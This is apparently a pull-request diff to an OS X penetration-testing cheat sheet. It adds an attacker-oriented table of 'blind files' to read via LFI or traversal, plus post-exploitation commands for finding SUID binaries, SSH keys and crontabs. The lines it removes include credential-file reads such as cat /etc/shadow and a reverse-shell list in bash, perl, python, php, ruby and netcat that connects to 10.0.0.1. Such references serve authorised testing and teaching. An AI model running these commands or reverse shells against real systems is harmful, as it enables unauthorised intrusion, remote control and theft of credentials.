### PR TITLE
Moving the OS X bulk stuff to the appropriate files and formatting.

### DIFF
--- a/navigation.md
+++ b/navigation.md
@@ -34,6 +34,7 @@
   * [Google Doc Content](osx/bulk.md)
   * [Bash Commands](osx/bash.md)
   * [Files - Blind](osx/blind.md)
+  * [Files - Finding](osx/find_files.md)
   * [Persistance](osx/persistance.md)
   * [Privilege Escalation](osx/privesc.md)
 

--- a/osx/blind.md
+++ b/osx/blind.md
@@ -1,3 +1,17 @@
-# Place Holder
 
-Content coming. Feel free to submit ;-)
+# OS X Blind Files
+
+In some cases during exploitation you as an attacker gain the ability to read arbitrary files. As an attacker you need go-to files that cover as many different OS versions as possible in order to either confirm exploitation or gather intelligence on the exploited system. For this we use a "blind file".
+
+The files below are things to pull when all you can do is to blindly read. Examples of vulnerabilities or situations where this would be helpful might be: local file includes (LFI), directory traversals or remote file share instances like SMB, FTP, NFS or otherwise. Files that will have the same name across networks, Windows domains, and systems are noted below. 
+
+| File     | Description / Importance |
+| -------- | ------------------------ |
+| /etc/fstab | Displays the file systems and mounted permissions of file systems attached to the host. |
+| /etc/group | User group assignments. Displays user and group names and which user is a member of which group. |
+| /etc/hosts | Manually-entered IP to hostname translation. |
+| /etc/master.passwd | **Must be root to read.** Contains users, their UID, primary group, and default shell. |
+| /etc/passwd | Contains users, their UID, primary group, and default shell. |
+| /etc/resolv.conf | Configuration file for DNS server entries. |
+| /etc/sudoers | Configuration file for the `sudo` command. May tell you if some users can elevate privileges with or without a password using the `sudo` command. |
+| /etc/sysctl.conf | Contains a list of sysctl variable assignments that is read at system startup by rc early on in the boot sequence. [^1](http://www.openbsd.org/cgi-bin/man.cgi?query=sysctl.conf&sektion=5) |

--- a/osx/bulk.md
+++ b/osx/bulk.md
@@ -53,54 +53,6 @@ netstat -nltupw (root with raw sockets)
 arp -a
 lsof -nPi</code>
 
-## Configs
-<code>ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
-cat /etc/issue{,.net}
-cat /etc/passwd
-cat /etc/shadow (gotta try..)
-cat /etc/shadow~ # (sometimes there when edited with gedit)
-cat /etc/master.passwd
-cat /etc/group
-cat /etc/hosts
-cat /etc/crontab
-cat /etc/sysctl.conf
-for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
-cat /etc/resolv.conf
-cat /etc/samba/smb.conf
-pdbedit -L -w
-pdbedit -L -v
-cat /etc/exports
-cat /etc/auto.master
-cat /etc/auto_maste
-cat /etc/fstab
-cat /etc/exports
-find /etc/sysconfig/ -type f -exec cat {} \;
-cat /etc/sudoers</code>
-
-## Package Sources
-<code>cat /etc/apt/sources.list
-ls -l /etc/yum.repos.d/
-cat  /etc/yum.conf</code>
-
-## Finding Important Files
-<code>find /var/log -type f -exec ls -la {} \;
-ls -alhtr /mnt
-ls -alhtr /Volumes
-ls -alhtr /tmp
-ls -alhtr /home
-ls /Users/*/.ssh/*
-find /home -type f -iname '.*history'
-ls -lart /etc/rc.d/
-locate tar | grep [.]tar$
-locate tgz | grep [.]tgz$
-locate sql l grep [.]sql$
-locate settings | grep [.]php$
-locate config.inc | grep [.]php$
-ls /Users/*/id*
-locate .properties | grep [.]properties # java config files
-locate .xml | grep [.]xml # java/.net config files
-find /sbin /usr/sbin /opt /lib `echo $PATH | 'sed s/:/ /g'` -perm -4000 # find suids</code>
-
 ## Per User
 <code>ls -alh /Users/*/
 ls -alh /Users/*/.ssh/
@@ -114,25 +66,3 @@ grep ^mysql /Users/*/.*hist*
 cat /Users/*/.viminfo
 sudo -l # if sudoers is not readable, this sometimes works per user
 crontab -l</code>
-
-## Priv (sudo'd or as root)
-<code>ls -alh /root/
-cat /etc/sudoers
-cat /etc/shadow
-cat /etc/master.passwd # OpenBSD
-cat /var/spool/cron/crontabs/*
-lsof -nPi
-ls /Users/*/.ssh/*</code>
-
-## Reverse Shell
-<code>starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # No /dev/tcp on Mac OS X
-perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
-ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
-nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
-rm /tmp/;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
-xterm -display 10.0.0.1:1
-Listener-     Xnest :1
-Add permission to connect-  xhost +victimIPf</code>

--- a/osx/find_files.md
+++ b/osx/find_files.md
@@ -1,0 +1,15 @@
+# OS X Finding File Commands
+
+Commands that find files on the filesystem and are usually executed from the context of the shell (`/bin/bash` or `/bin/sh`) prompt.
+
+| Command  | Description / Importance |
+| -------- | ------------------------ |
+| `find /sbin /usr/sbin /opt /lib` &#96;`echo $PATH` &#124;`'sed s/:/ /g'`&#96;` -perm -4000` | Find SUID files. |
+| `for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done` | Lists all the user crontab or scheduled tasks files. |
+| `find /var/log -type f -exec ls -la {} \;` | Find all the log files in `/var/log/` |
+| `ls -alhtr /Volumes` | Display the volumes mounted at `/Volumes` |
+| `ls /Users/*/.ssh/*` | Discover SSH files (keys and such) located in each user's home drive. May require root permissions to view these files in other user's directories. |
+| `locate tar` &#124; `grep [.]tar$` | Finds all files that have a `.tar` extension. Substitute other archive extensions (e.g., `.zip`, `.7z`, `.rar`) or other extensions such as `.sql` or `.conf`. |
+| `locate settings` $#124; `grep [.]php$` | Find all files with the word settings in it and with a `.php` extension. |
+| `locate .properties` $#124; `grep [.]properties` | Finds Java configuration files. | 
+


### PR DESCRIPTION
The formatting in the tables of the finding_files.md file is 'off' since GFM renders/executes the pipe and `chars in tables. I cannot use <code> or``` in a table with them. 
